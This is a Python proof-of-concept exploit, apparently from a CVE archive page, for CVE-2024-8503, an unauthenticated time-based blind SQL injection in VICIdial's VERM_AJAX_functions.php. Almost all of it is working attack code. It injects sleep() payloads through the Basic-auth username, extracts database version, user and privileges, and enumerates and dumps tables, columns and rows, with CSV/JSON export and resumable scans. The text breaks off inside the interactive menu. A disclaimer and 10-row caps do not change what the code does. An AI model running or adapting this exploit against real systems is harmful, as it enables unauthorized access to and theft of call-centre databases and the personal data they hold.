5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-8503-POC.py PY
#!/usr/bin/env python3
"""
VICIdial CVE-2024-8503 Proof of Concept Tool
=============================================
Unauthenticated SQL Injection in VERM_AJAX_functions.php

LEGAL DISCLAIMER:
This tool is provided for authorized security testing and educational purposes only.
Unauthorized access to computer systems is illegal. Users must obtain explicit written
permission before testing any systems they do not own. The authors assume no liability
for misuse or damage caused by this tool.

Author: Machine-Farmer
CVE: CVE-2024-8503
Date: November 2024
"""

import argparse
import requests
import time
import base64
import statistics
import sys
import json
import csv
import os
import pickle
from datetime import datetime
from typing import Optional, Dict, List, Tuple

# Silence urllib3 warnings: every request in this file is sent with
# verify=False, which would otherwise produce a warning on each call.
requests.packages.urllib3.disable_warnings()

# ============================================================================
# CONFIGURATION - STRICT LIMITS FOR SECURITY
# ============================================================================

# Tool version. OutputFormatter.print_banner hard-codes the same value in its
# banner text, so the two must be updated together.
VERSION = "1.0.1"
# Inclusive ordinal range searched by SQLInjectionEngine.extract_character
# (32..126 is the printable ASCII range).
CHAR_MIN = 32
CHAR_MAX = 126
# Default maximum number of characters SQLInjectionEngine.extract_string reads.
MAX_LENGTH = 250
# Maximum number of characters read per cell in extract_table_data.
MAX_CELL_LENGTH = 100
# Default number of baseline requests made by calibrate_timing.
BASELINE_ITERS = 4
# calibrate_timing sets sleep_duration = max(2, round(baseline_avg * SLEEP_MULTIPLIER)).
SLEEP_MULTIPLIER = 30

# Stricter limits for PoC security
# DEFAULT_* are the default `limit` arguments; MAX_* are the caps applied by
# extract_table_data (rows) and get_table_columns (columns).
DEFAULT_ROW_LIMIT = 10
MAX_ROW_LIMIT = 10
DEFAULT_COLUMN_LIMIT = 10
MAX_COLUMN_LIMIT = 10
# list_tables uses this both as its default and as its upper clamp.
DEFAULT_TABLE_LIMIT = 10
# Auto-extraction limits
# Passed by auto_extract_table to get_table_columns / extract_table_data.
AUTO_COLUMN_LIMIT = 10
AUTO_ROW_LIMIT = 10

# Metadata name -> SQL expression or full SELECT statement.
# VulnerabilityScanner.extract_metadata prefixes "SELECT " to any value that
# does not already start with "SELECT".
METADATA_QUERIES = {
    'db_version': '@@version',
    'database': 'DATABASE()',
    'db_user': 'CURRENT_USER()',
    'hostname': '@@hostname',
    'db_privileges': 'SELECT GROUP_CONCAT(privilege_type) FROM information_schema.user_privileges WHERE grantee LIKE CONCAT("%",SUBSTRING_INDEX(CURRENT_USER(),"@",1),"%") LIMIT 1',
    'table_count': 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE()',
}

# ============================================================================
# STATE MANAGEMENT FOR RESUMABLE SCANS
# ============================================================================

class ScanState:
    """Persist scan progress in a JSON file so an interrupted scan can resume.

    The in-memory ``state`` dict always contains every key produced by
    ``_default_state``; values loaded from disk are normalised against those
    defaults so that a partial, outdated or hand-edited state file cannot
    break the accessors below.
    """

    def __init__(self, state_file: str = ".vicidial_scan_state.json"):
        """Create the state holder and load ``state_file`` if it exists."""
        self.state_file = state_file
        self.state = self._default_state()
        self.load_state()

    @staticmethod
    def _default_state() -> dict:
        """Return a fresh, empty state dict (new containers on every call)."""
        return {
            'target': None,
            'completed_steps': [],
            'metadata_results': {},
            'tables_list': [],
            'table_columns': {},  # table -> [columns]
            'table_data': {},     # table -> {column -> [rows]}
            'current_step': None,
            'last_updated': None
        }

    def load_state(self):
        """Load previous scan state if exists

        Keys missing from the file, or holding a value of the wrong container
        type (e.g. ``null`` where a list is expected), fall back to their
        defaults. Unknown keys in the file are kept. A file that is unreadable
        or does not contain a JSON object is reported and ignored.
        """
        if os.path.exists(self.state_file):
            try:
                with open(self.state_file, 'r', encoding='utf-8') as f:
                    loaded = json.load(f)
                if not isinstance(loaded, dict):
                    raise ValueError("state file does not contain a JSON object")

                state = dict(loaded)
                for key, default in self._default_state().items():
                    # Scalar slots (default None) accept any value; container
                    # slots must hold the same container type as the default.
                    if default is not None and not isinstance(state.get(key), type(default)):
                        state[key] = default
                    else:
                        state.setdefault(key, default)
                self.state = state
                print(f"[+] Loaded previous scan state from {self.state_file}")
            except (OSError, ValueError) as e:
                # json.JSONDecodeError and UnicodeDecodeError are ValueErrors.
                print(f"[!] Could not load state file: {e}")
        elif os.path.exists(".vicidial_scan_state.pkl"):
            print("[!] Legacy pickle state file found; ignoring for safety. Remove it if not needed.")

    def save_state(self):
        """Save current scan state

        The state is serialised first and written to a sibling temporary file
        that then replaces ``state_file``, so an interruption mid-write cannot
        leave a truncated state file behind. Failures are reported, not raised.
        """
        self.state['last_updated'] = datetime.now().isoformat()
        tmp_path = f"{self.state_file}.tmp"
        try:
            payload = json.dumps(self.state, indent=2)
            with open(tmp_path, 'w', encoding='utf-8') as f:
                f.write(payload)
            os.replace(tmp_path, self.state_file)
        except (OSError, TypeError, ValueError) as e:
            print(f"[!] Could not save state: {e}")

    def clear_state(self):
        """Clear saved state (delete the file and reset the in-memory state)"""
        try:
            os.remove(self.state_file)
        except FileNotFoundError:
            # Nothing to delete; clearing is still successful.
            pass
        self.state = self._default_state()

    def is_step_completed(self, step: str) -> bool:
        """Check if a step was already completed"""
        return step in self.state['completed_steps']

    def mark_step_completed(self, step: str):
        """Mark a step as completed (idempotent) and persist the state"""
        if step not in self.state['completed_steps']:
            self.state['completed_steps'].append(step)
        self.save_state()

    def update_metadata(self, key: str, value: str):
        """Update metadata results and persist the state"""
        self.state['metadata_results'][key] = value
        self.save_state()

    def get_metadata(self, key: str) -> Optional[str]:
        """Get saved metadata, or None when ``key`` was never stored"""
        return self.state['metadata_results'].get(key)

    def update_tables(self, tables: List[str]):
        """Update tables list and persist the state"""
        self.state['tables_list'] = tables
        self.save_state()

    def get_tables(self) -> List[str]:
        """Get saved tables"""
        return self.state.get('tables_list', [])

    def update_table_columns(self, table: str, columns: List[str]):
        """Update columns for a table and persist the state"""
        self.state.setdefault('table_columns', {})[table] = columns
        self.save_state()

    def get_table_columns(self, table: str) -> List[str]:
        """Get saved columns for table (empty list when unknown)"""
        return self.state.get('table_columns', {}).get(table, [])

    def update_table_data(self, table: str, column: str, rows: List[str]):
        """Update row data for table/column and persist the state"""
        per_table = self.state.setdefault('table_data', {})
        per_table.setdefault(table, {})[column] = rows
        self.save_state()

    def get_table_data(self, table: str, column: str) -> List[str]:
        """Get saved row data for table/column (empty list when unknown)"""
        return self.state.get('table_data', {}).get(table, {}).get(column, [])

    def set_target(self, target: str):
        """Set target URL and persist the state"""
        self.state['target'] = target
        self.save_state()

    def get_target(self) -> Optional[str]:
        """Get saved target"""
        return self.state.get('target')

    def show_resume_prompt(self) -> bool:
        """Show resume prompt and get user choice

        Returns:
            True only when a previous target exists and the user answers
            ``y``. Answering ``clear`` wipes the saved state and returns False.
        """
        if not self.state.get('target'):
            return False

        completed = self.state['completed_steps']
        print("\n" + "="*70)
        print("PREVIOUS SCAN DETECTED")
        print("="*70)
        print(f"Target: {self.state['target']}")
        # The key always exists (possibly as None), so fall back explicitly.
        print(f"Last Updated: {self.state.get('last_updated') or 'Unknown'}")
        print(f"Completed Steps: {len(completed)}")
        for step in completed:
            print(f"  ✓ {step}")
        print(f"Tables Found: {len(self.state.get('tables_list', []))}")
        print(f"Tables with Columns: {len(self.state.get('table_columns', {}))}")
        print("="*70)

        choice = input("\nResume from previous scan? (y/n/clear): ").strip().lower()
        if choice == 'clear':
            self.clear_state()
            print("[+] Scan state cleared. Starting fresh.")
            return False
        return choice == 'y'

# ============================================================================
# NOTIFICATION SYSTEM
# ============================================================================

def send_notification(title: str, message: str):
    """Send desktop notification when scan completes

    Best effort: any failure (missing notifier binary, missing optional
    package, notifier error) falls back to the terminal bell.

    Args:
        title: Notification title.
        message: Notification body.
    """
    # Local import keeps this block self-contained; subprocess is stdlib.
    import subprocess

    title = str(title)
    message = str(message)

    def _applescript_quote(text: str) -> str:
        """Escape text for use inside a double-quoted AppleScript string."""
        return text.replace('\\', '\\\\').replace('"', '\\"')

    try:
        if sys.platform == 'darwin':
            script = (
                f'display notification "{_applescript_quote(message)}" '
                f'with title "{_applescript_quote(title)}"'
            )
            # argv list, no shell: the text is never parsed by /bin/sh.
            subprocess.run(['osascript', '-e', script], check=False, timeout=10)
        elif sys.platform == 'linux':
            # "--" ends option parsing so text starting with "-" is not
            # interpreted as a notify-send option.
            subprocess.run(['notify-send', '--', title, message], check=False, timeout=10)
        elif sys.platform == 'win32':
            try:
                from win10toast import ToastNotifier
                toaster = ToastNotifier()
                toaster.show_toast(title, message, duration=10)
            except ImportError:
                print('\a')
        else:
            print('\a')
    except Exception:
        # Deliberately broad: a notification must never abort the caller.
        print('\a')

def play_completion_sound():
    """Ring the terminal bell to signal that a scan has finished."""
    bell = '\a'
    try:
        print(bell)
    except Exception:
        # Best effort only: a failed write to stdout is ignored.
        return

# ============================================================================
# CORE EXPLOITATION ENGINE
# ============================================================================

class SQLInjectionEngine:
    """Core engine for time-based blind SQL injection

    Every probe is an HTTP GET whose Basic-auth username carries the payload.
    A condition is read back as true when the response takes at least
    ``timing_threshold`` seconds.

    Attributes:
        target: URL requested by every probe.
        params: Query-string parameters sent with every probe.
        sleep_duration: Seconds passed to SQL ``sleep()`` in the payload.
        timing_threshold: ``sleep_duration * 0.8``; minimum elapsed time that
            counts as a delayed (true) response.
    """
    
    def __init__(self, target: str, params: dict, sleep_duration: int):
        """Store the request target/parameters and derive the timing threshold."""
        self.target = target
        self.params = params
        self.sleep_duration = sleep_duration
        self.timing_threshold = sleep_duration * 0.8
    
    @staticmethod
    def make_auth_header(user: str, pwd: str = 'x') -> dict:
        """Create Basic Auth header with injected username

        Args:
            user: Text placed in the username part of the credential.
            pwd: Password part of the credential.

        Returns:
            A one-entry dict with the base64-encoded ``Authorization`` header.
        """
        cred = f"{user}:{pwd}"
        return {'Authorization': 'Basic ' + base64.b64encode(cred.encode()).decode()}
    
    def probe(self, headers: dict, timeout: int = 30) -> Tuple[Optional[float], Optional[int]]:
        """Execute single HTTP probe and measure response time

        Args:
            headers: Request headers to send.
            timeout: Request timeout in seconds.

        Returns:
            ``(elapsed_seconds, status_code)``, or ``(None, None)`` when the
            request raised any exception (including a timeout).
        """
        try:
            start = time.perf_counter()
            r = requests.get(self.target, params=self.params, headers=headers, 
                           verify=False, timeout=timeout)
            elapsed = time.perf_counter() - start
            return elapsed, r.status_code
        except Exception:
            return None, None
    
    def test_condition(self, query: str, position: int, threshold: int) -> Optional[bool]:
        """Test if ASCII value at position is <= threshold

        Args:
            query: SQL query whose result string is being read.
            position: 1-based character position passed to ``SUBSTRING``.
            threshold: Ordinal to compare against.

        Returns:
            True when the response was delayed by at least
            ``timing_threshold``, False when it was faster, and None when the
            probe itself failed.
        """
        condition = f"ASCII(SUBSTRING(({query}),{position},1))<={threshold}"
        inner_query = f"SELECT IF({condition},sleep({self.sleep_duration}),NULL)"
        payload = f"goolicker', '', ({inner_query}));#:"
        
        headers = {'User-Agent': 'KoreLogic-Test', **self.make_auth_header(payload)}
        elapsed, _ = self.probe(headers)
        
        if elapsed is None:
            return None
        return elapsed >= self.timing_threshold
    
    def extract_character(self, query: str, position: int, max_retries: int = 3) -> Optional[str]:
        """Extract single character at position using binary search with retry logic

        Args:
            query: SQL query whose result string is being read.
            position: 1-based character position.
            max_retries: Number of attempts before giving up.

        Returns:
            The character found, or None when the position is treated as
            having no extractable character (the ``<= CHAR_MIN - 1`` probe was
            delayed, the search found no candidate, or the candidate could not
            be confirmed).

        Raises:
            RuntimeError: A probe failed on the final attempt.
        """
        for attempt in range(max_retries):
            try:
                # A delayed response to "ordinal <= CHAR_MIN - 1" means the
                # value lies below the searched range; report no character.
                exists = self.test_condition(query, position, CHAR_MIN - 1)
                if exists is None:
                    if attempt < max_retries - 1:
                        print(f"\n[!] Network error at position {position}, retry {attempt + 1}/{max_retries}...")
                        time.sleep(2)
                        continue
                    raise RuntimeError(f"Network error at position {position} after {max_retries} retries")
                
                if exists:
                    return None
                
                # Binary search for the smallest threshold in
                # [CHAR_MIN, CHAR_MAX] for which "ordinal <= threshold" holds.
                low, high = CHAR_MIN, CHAR_MAX
                char_ord = None
                
                while low <= high:
                    mid = (low + high) // 2
                    is_lte = self.test_condition(query, position, mid)
                    
                    if is_lte is None:
                        if attempt < max_retries - 1:
                            print(f"\n[!] Network error during binary search, retry {attempt + 1}/{max_retries}...")
                            time.sleep(2)
                            # Leaves only the while loop; execution continues
                            # below with whatever char_ord holds so far.
                            break
                        raise RuntimeError(f"Network error at position {position} after {max_retries} retries")
                    
                    if is_lte:
                        char_ord = mid
                        high = mid - 1
                    else:
                        low = mid + 1
                
                if char_ord is None:
                    if attempt < max_retries - 1:
                        continue
                    return None
                
                # Confirm the candidate: "<= char_ord" must hold and
                # "<= char_ord - 1" must not.
                current = self.test_condition(query, position, char_ord)
                previous = self.test_condition(query, position, char_ord - 1)
                
                if current and not previous:
                    return chr(char_ord)
                
                # Confirmation failed: re-test every ordinal within 2 of the
                # candidate, clamped to [CHAR_MIN, CHAR_MAX].
                for ordinal in range(max(CHAR_MIN, char_ord - 2), min(CHAR_MAX, char_ord + 2) + 1):
                    curr = self.test_condition(query, position, ordinal)
                    prev = self.test_condition(query, position, ordinal - 1)
                    if curr and not prev:
                        return chr(ordinal)
                
                return None
                
            except RuntimeError as e:
                # Only re-raised on the final attempt; earlier attempts retry.
                if attempt < max_retries - 1:
                    print(f"\n[!] Error: {e}, retry {attempt + 1}/{max_retries}...")
                    time.sleep(2)
                    continue
                raise
        
        return None
    
    def extract_string(self, query: str, maxlen: int = MAX_LENGTH, 
                      show_progress: bool = True) -> str:
        """Extract complete string from SQL query result

        Args:
            query: SQL query whose result string is being read.
            maxlen: Maximum number of characters to read.
            show_progress: When True, each character is written to stdout as
                soon as it is found.

        Returns:
            The characters read, stopping at the first position for which
            ``extract_character`` returns None or after ``maxlen`` characters.

        Raises:
            RuntimeError: Propagated from ``extract_character``.
        """
        result = []
        
        for pos in range(1, maxlen + 1):
            char = self.extract_character(query, pos)
            
            if char is None:
                break
            
            result.append(char)
            if show_progress:
                sys.stdout.write(char)
                sys.stdout.flush()
        
        return ''.join(result)

# ============================================================================
# VULNERABILITY SCANNER
# ============================================================================

class VulnerabilityScanner:
    """Main scanner for CVE-2024-8503

    Attributes:
        target: ``url`` with trailing slashes removed, followed by ``path``.
        params: Query-string parameters sent with every request.
        engine: ``SQLInjectionEngine`` created by ``initialize``; None before.
        baseline_avg: Mean baseline response time from ``calibrate_timing``.
        sleep_duration: Sleep length in seconds derived from the baseline.
    """
    
    def __init__(self, url: str, path: str):
        """Build the target URL and reset timing state."""
        self.target = url.rstrip('/') + path
        self.params = {'function': 'log_custom_report'}
        self.engine = None
        self.baseline_avg = 0.0
        self.sleep_duration = 0
    
    def calibrate_timing(self, iterations: int = BASELINE_ITERS) -> bool:
        """Calibrate baseline timing and determine sleep duration

        Args:
            iterations: Number of baseline requests to attempt.

        Returns:
            True when at least one request succeeded and ``baseline_avg`` /
            ``sleep_duration`` were set. False when the final attempt timed
            out or could not connect, when an unexpected exception occurred,
            or when no attempt succeeded.
        """
        print("[*] Calibrating timing baseline...")
        baseline_times = []
        
        for i in range(iterations):
            try:
                start = time.perf_counter()
                response = requests.get(self.target, params=self.params, 
                           headers={'User-Agent': 'KoreLogic-Test'}, 
                           verify=False, timeout=30)
                elapsed = time.perf_counter() - start
                baseline_times.append(elapsed)
                print(f"    Attempt {i+1}/{iterations}: {elapsed:.3f}s (Status: {response.status_code})")
                time.sleep(0.25)
            except requests.exceptions.Timeout:
                print(f"[-] Timeout on attempt {i+1}/{iterations}")
                if i < iterations - 1:
                    print("    Retrying...")
                    continue
                else:
                    print("[-] Too many timeouts during calibration")
                    return False
            except requests.exceptions.ConnectionError as e:
                print(f"[-] Connection error on attempt {i+1}/{iterations}: {e}")
                if i < iterations - 1:
                    print("    Retrying...")
                    time.sleep(1)
                    continue
                else:
                    print("[-] Could not connect to target")
                    return False
            except Exception as e:
                print(f"[-] Unexpected error during calibration: {e}")
                return False
        
        if not baseline_times:
            print("[-] No successful calibration attempts")
            return False
        
        self.baseline_avg = statistics.mean(baseline_times)
        # Never sleep for less than 2 seconds, however fast the baseline is.
        self.sleep_duration = max(2, round(self.baseline_avg * SLEEP_MULTIPLIER))
        
        print(f"[+] Baseline: {self.baseline_avg:.3f}s | Sleep: {self.sleep_duration}s")
        return True
    
    def verify_vulnerability(self) -> bool:
        """Verify target is vulnerable

        Sends one request whose payload sleeps unconditionally for
        ``sleep_duration`` seconds.

        Returns:
            True when the response took at least 80% of ``sleep_duration``;
            False otherwise or when the request raised an exception.
        """
        print("[*] Testing vulnerability...")
        
        inj_user = f"', '', sleep({self.sleep_duration}));#:"
        headers = {
            'User-Agent': 'KoreLogic-Test',
            **SQLInjectionEngine.make_auth_header(inj_user)
        }
        
        try:
            start = time.perf_counter()
            requests.get(self.target, params=self.params, headers=headers,
                       verify=False, timeout=self.sleep_duration + 10)
            elapsed = time.perf_counter() - start
            
            if elapsed >= (self.sleep_duration * 0.8):
                print(f"[+] Vulnerability CONFIRMED (delay: {elapsed:.3f}s)")
                return True
            else:
                print(f"[-] Vulnerability NOT detected (delay: {elapsed:.3f}s)")
                return False
        except Exception as e:
            print(f"[-] Error during verification: {e}")
            return False
    
    def initialize(self, skip_vuln_check: bool = False) -> bool:
        """Initialize scanner and verify vulnerability

        Args:
            skip_vuln_check: When True, ``verify_vulnerability`` is not run.

        Returns:
            True when calibration (and verification, unless skipped)
            succeeded and ``engine`` was created; False otherwise.
        """
        if not self.calibrate_timing():
            return False
        
        if not skip_vuln_check:
            if not self.verify_vulnerability():
                return False
        
        self.engine = SQLInjectionEngine(self.target, self.params, self.sleep_duration)
        return True
    
    def extract_metadata(self, query_name: str, query: str) -> Optional[str]:
        """Extract metadata using SQL query

        Args:
            query_name: Label printed while extracting.
            query: SQL expression or full ``SELECT`` statement.

        Returns:
            The extracted string, or None when ``engine`` has not been created
            or extraction raised ``RuntimeError``.
        """
        if not self.engine:
            return None
        
        # Bare expressions such as "@@version" are wrapped in a SELECT.
        full_query = query if query.startswith('SELECT') else f"SELECT {query}"
        
        try:
            print(f"\n[+] Extracting: {query_name}")
            print(f"    Query: {query}")
            sys.stdout.write(f"    Value: ")
            sys.stdout.flush()
            
            result = self.engine.extract_string(full_query)
            print(f"\n    Result: {repr(result)}")
            return result
        except RuntimeError as e:
            print(f"\n    ERROR: {e}")
            return None
    
    def list_tables(self, limit: int = DEFAULT_TABLE_LIMIT) -> List[str]:
        """List table names from database

        Args:
            limit: Requested number of tables; clamped to
                ``[1, DEFAULT_TABLE_LIMIT]``.

        Returns:
            Table names split on commas, or an empty list when nothing was
            extracted or extraction raised ``RuntimeError``.
        """
        # NOTE(review): unlike extract_metadata, self.engine is not checked
        # for None here, so this relies on initialize() having succeeded.
        limit = min(max(limit, 1), DEFAULT_TABLE_LIMIT)
        query = (
            "SELECT GROUP_CONCAT(table_name SEPARATOR ',') "
            "FROM (SELECT table_name FROM information_schema.tables "
            "WHERE table_schema=DATABASE() ORDER BY table_name LIMIT {limit}) AS tbls"
        ).format(limit=limit)
        
        print(f"\n[+] Listing tables (limit: {limit})...")
        sys.stdout.write("    Tables: ")
        sys.stdout.flush()
        
        try:
            tables_str = self.engine.extract_string(query)
            print("\n")
            
            if not tables_str:
                return []
            
            return tables_str.split(',')
        except RuntimeError as e:
            print(f"\n    ERROR: {e}")
            return []
    
    def get_table_columns(self, table: str, limit: int = DEFAULT_COLUMN_LIMIT) -> List[str]:
        """Get column names for a table

        Args:
            table: Table name, interpolated into the query as given.
            limit: Requested number of columns; capped at
                ``MAX_COLUMN_LIMIT`` (no lower bound is applied).

        Returns:
            Column names split on commas, or an empty list when nothing was
            extracted or extraction raised ``RuntimeError``.
        """
        if limit > MAX_COLUMN_LIMIT:
            print(f"    [!] Limit capped at {MAX_COLUMN_LIMIT} columns for PoC")
            limit = MAX_COLUMN_LIMIT
        
        query = f"SELECT GROUP_CONCAT(column_name SEPARATOR ',') FROM (SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='{table}' LIMIT {limit}) AS cols"
        
        print(f"\n[+] Getting columns for table: {table} (limit: {limit})")
        sys.stdout.write("    Columns: ")
        sys.stdout.flush()
        
        try:
            cols_str = self.engine.extract_string(query)
            print("\n")
            
            if not cols_str:
                return []
            
            return cols_str.split(',')
        except RuntimeError as e:
            print(f"\n    ERROR: {e}")
            return []
    def extract_table_data(self, table: str, columns: List[str], 
                        limit: int = DEFAULT_ROW_LIMIT, start_position: int = 0) -> List[Dict[str, str]]:
        """Extract data from table with improved error handling

        Args:
            table: Table name, interpolated into each query as given.
            columns: Column names to read, one query per column per row.
            limit: Number of rows to attempt; capped at ``MAX_ROW_LIMIT``.
            start_position: Zero-based row offset of the first row to read.

        Returns:
            One dict per row that produced at least one non-empty value,
            mapping column name to the extracted value, ``"NULL"`` for an
            empty result, or ``"ERROR"`` when extraction failed. Returns the
            rows collected so far after three consecutive errors or a
            ``KeyboardInterrupt``.
        """
        if limit > MAX_ROW_LIMIT:
            print(f"    [!] Row limit capped at {MAX_ROW_LIMIT} for PoC")
            limit = MAX_ROW_LIMIT
        
        print(f"\n[+] Extracting data from: {table}")
        print(f"    Columns: {', '.join(columns)}")
        print(f"    Starting from row: {start_position + 1}")
        print(f"    Rows to extract: {limit}\n")
        
        results = []
        consecutive_errors = 0
        max_consecutive_errors = 3
        
        for offset in range(limit):
            row_num = start_position + offset
            print(f"[Row {row_num + 1} (offset {offset + 1}/{limit})]")
            row_data = {}
            row_has_data = False
            
            for col in columns:
                query = f"SELECT {col} FROM {table} LIMIT {row_num},1"
                sys.stdout.write(f"  {col:.<25} ")
                sys.stdout.flush()
                
                try:
                    value = self.engine.extract_string(query, maxlen=MAX_CELL_LENGTH, show_progress=False)
                    row_data[col] = value if value else "NULL"
                    if value:
                        row_has_data = True
                    print(value if value else "NULL")
                    consecutive_errors = 0  # Reset error counter on success
                except RuntimeError as e:
                    print(f"ERROR: {str(e)[:50]}")
                    row_data[col] = "ERROR"
                    consecutive_errors += 1
                    
                    if consecutive_errors >= max_consecutive_errors:
                        # The partially read current row is discarded.
                        print(f"\n[!] Too many consecutive errors ({consecutive_errors}), stopping extraction")
                        print(f"[!] Successfully extracted {len(results)} rows before errors")
                        return results
                except KeyboardInterrupt:
                    print("\n[!] Extraction interrupted by user")
                    print(f"[!] Partial results: {len(results)} rows extracted")
                    return results
                except Exception as e:
                    print(f"UNEXPECTED ERROR: {str(e)[:50]}")
                    row_data[col] = "ERROR"
                    consecutive_errors += 1
                    
                    if consecutive_errors >= max_consecutive_errors:
                        print(f"\n[!] Too many consecutive errors, stopping extraction")
                        return results
            
            # Only add row if it has some actual data
            if row_has_data or any(v not in ["NULL", "ERROR"] for v in row_data.values()):
                results.append(row_data)
            else:
                # The loop keeps going after an empty row; the early exit
                # below is disabled.
                print(f"  [!] Row {row_num + 1} appears empty, may have reached end of table")
                # If we get an empty row, we might be past the end of the table
                # if row_num > start_position:  # Don't stop if it's the first row at new position
                #    break
            
            print()
        
        return results
    
    def auto_extract_table(self, table: str) -> Tuple[List[str], List[Dict[str, str]]]:
        """Automatically discover columns and extract data from table

        Args:
            table: Table name.

        Returns:
            ``(columns, rows)`` from ``get_table_columns`` and
            ``extract_table_data`` using the ``AUTO_*`` limits, or
            ``([], [])`` when no columns were found.
        """
        print(f"\n[+] Auto-extracting from table: {table}")
        print(f"    Step 1: Discovering columns (limit: {AUTO_COLUMN_LIMIT})...")
        
        columns = self.get_table_columns(table, AUTO_COLUMN_LIMIT)
        if not columns:
            print("[-] No columns found")
            return [], []
        
        print(f"    Found {len(columns)} columns: {', '.join(columns)}")
        print(f"    Step 2: Extracting data (limit: {AUTO_ROW_LIMIT} rows)...\n")
        
        data = self.extract_table_data(table, columns, AUTO_ROW_LIMIT)
        
        return columns, data

# ============================================================================
# OUTPUT FORMATTERS
# ============================================================================

class OutputFormatter:
    """Format and display extraction results

    All methods are static; the class only groups the printing and export
    helpers.
    """

    @staticmethod
    def print_banner():
        """Print tool banner"""
        banner = """
╔═══════════════════════════════════════════════════════════════════════╗
║                                                                       ║
║         VICIdial CVE-2024-8503 Proof of Concept Tool                 ║
║         Unauthenticated SQL Injection Exploit                         ║
║                                                                       ║
║         Version: 1.0.1 (Secure Edition)                               ║
║         Author: Machine-Farmer                                        ║
║         For Authorized Security Testing Only                          ║
║                                                                       ║
╚═══════════════════════════════════════════════════════════════════════╝
"""
        print(banner)

    @staticmethod
    def print_metadata_summary(results: Dict[str, str]):
        """Print metadata extraction summary

        Args:
            results: Metadata name -> extracted value. A value of None (a
                failed extraction) is shown as ``N/A``; other non-string
                values are shown via ``str()``.
        """
        rule = "=" * 70
        print("\n" + rule)
        print("METADATA EXTRACTION SUMMARY")
        print(rule)

        for key, value in results.items():
            label = key.replace('_', ' ').title()

            if key == 'table_names' and isinstance(value, str) and value and value != 'ERROR':
                # Comma-separated table list: show at most the first 15.
                print(f"{label}:")
                for idx, tbl in enumerate(value.split(',')[:15], 1):
                    print(f"  {idx:2d}. {tbl}")
                continue

            text = "N/A" if value is None else str(value)
            display_val = text[:60] + "..." if len(text) > 60 else text
            print(f"  {label:.<25} {display_val}")

        print(rule)

    @staticmethod
    def print_table_list(tables: List[str]):
        """Print list of tables"""
        rule = "=" * 70
        print("\n" + rule)
        print(f"TABLES FOUND: {len(tables)}")
        print(rule)

        for idx, table in enumerate(tables, 1):
            print(f"  {idx:2d}. {table}")

        print(rule)

    @staticmethod
    def print_columns_list(table: str, columns: List[str]):
        """Print list of columns"""
        rule = "=" * 70
        print("\n" + rule)
        print(f"COLUMNS IN TABLE: {table}")
        print(rule)

        for idx, col in enumerate(columns, 1):
            print(f"  {idx:2d}. {col}")

        print(rule)

    @staticmethod
    def print_table_data(table: str, columns: List[str], data: List[Dict[str, str]]):
        """Print extracted table data

        Args:
            table: Table name shown in the heading.
            columns: Column order for the grid.
            data: Rows as dicts; a key missing from a row is shown as ``N/A``.
        """
        if not data:
            print("[-] No data extracted")
            return

        # Column width: at least 10 and the header length, grown to fit the
        # longest value but never beyond 50 for the sake of the values.
        widths = {}
        for col in columns:
            longest = max((len(str(row.get(col, ''))) for row in data), default=0)
            widths[col] = max(len(col), 10, min(longest, 50))

        # "| " + cells joined by " | " + " |"  ==  sum(widths) + 3 * n + 1
        total_width = sum(widths.values()) + len(columns) * 3 + 1
        rule = "=" * total_width

        print("\n" + rule)
        print(f"DATA FROM TABLE: {table}".center(total_width))
        print(rule)

        header = " | ".join(col.ljust(widths[col]) for col in columns)
        print(f"| {header} |")
        print(rule)

        for row in data:
            cells = []
            for col in columns:
                value = str(row.get(col, 'N/A'))
                if len(value) > widths[col]:
                    value = value[:widths[col]-3] + "..."
                cells.append(value.ljust(widths[col]))

            row_str = " | ".join(cells)
            print(f"| {row_str} |")

        print(rule)
        print(f"\nTotal rows: {len(data)}\n")

    @staticmethod
    def export_json(data: dict, filename: str):
        """Export results to JSON

        The file is written as UTF-8 regardless of the platform default.
        """
        with open(filename, 'w', encoding='utf-8') as f:
            json.dump(data, f, indent=2)
        print(f"[+] Results exported to: {filename}")

    @staticmethod
    def export_csv(columns: List[str], data: List[Dict[str, str]], filename: str):
        """Export table data to CSV

        Args:
            columns: Header row and column order.
            data: Rows as dicts. Keys not listed in ``columns`` are ignored;
                keys missing from a row are written as empty cells.
            filename: Destination path, written as UTF-8.
        """
        with open(filename, 'w', newline='', encoding='utf-8') as f:
            writer = csv.DictWriter(f, fieldnames=columns, extrasaction='ignore')
            writer.writeheader()
            writer.writerows(data)
        print(f"[+] Data exported to: {filename}")

# ============================================================================
# INTERACTIVE MODE
# ============================================================================

class InteractiveMode:
    """Interactive menu-driven interface"""
    
    def __init__(self, scanner: VulnerabilityScanner, scan_state: Optional[ScanState] = None):
        """Store the scanner, the scan state to record into, and the metadata query table.

        A missing (or falsy) *scan_state* is replaced by a fresh ``ScanState()``.
        """
        self.metadata_queries = METADATA_QUERIES
        self.scan_state = scan_state or ScanState()
        self.scanner = scanner
    
    def show_main_menu(self):
        """Display main menu"""
        print("\n" + "="*70)
        print("MAIN MENU")
        print("="*70)
        print("  1. Extract Metadata")
        print("  2. List Tables")
        print("  3. Get Table Columns")
        print("  4. Extract Table Data (Manual)")
        print("  5. Auto-Extract Table Data (Discover + Extract)")
        print("  6. Custom Query")
        print("  7. Extract All (Full Scan - Resumable)")
        print("  8. View Scan State")
        print("  9. Clear Scan State")
        print("  0. Exit")
        print("="*70)
    
    def show_metadata_menu(self):
        """Display metadata extraction menu"""
        print("\n" + "="*70)
        print("METADATA EXTRACTION")
        print("="*70)
        print("  1. Database Version")
        print("  2. Database Name")
        print("  3. Database User")
        print("  4. Hostname")
        print("  5. User Privileges")
        print("  6. Table Count")
        print("  7. Extract All Metadata")
        print("  0. Back to Main Menu")
        print("="*70)
    
    def extract_metadata_interactive(self):
        """Interactive metadata extraction"""
        while True:
            self.show_metadata_menu()
            choice = input("\nSelect option: ").strip()
            
            if choice == '0':
                break
            elif choice == '1':
                result = self.scanner.extract_metadata('Database Version', self.metadata_queries['db_version'])
                if result:
                    self.scan_state.update_metadata('db_version', result)
            elif choice == '2':
                result = self.scanner.extract_metadata('Database Name', self.metadata_queries['database'])
                if result:
                    self.scan_state.update_metadata('database', result)
            elif choice == '3':
                result = self.scanner.extract_metadata('Database User', self.metadata_queries['db_user'])
                if result:
                    self.scan_state.update_metadata('db_user', result)
            elif choice == '4':
                result = self.scanner.extract_metadata('Hostname', self.metadata_queries['hostname'])
                if result:
                    self.scan_state.update_metadata('hostname', result)
            elif choice == '5':
                result = self.scanner.extract_metadata('User Privileges', self.metadata_queries['db_privileges'])
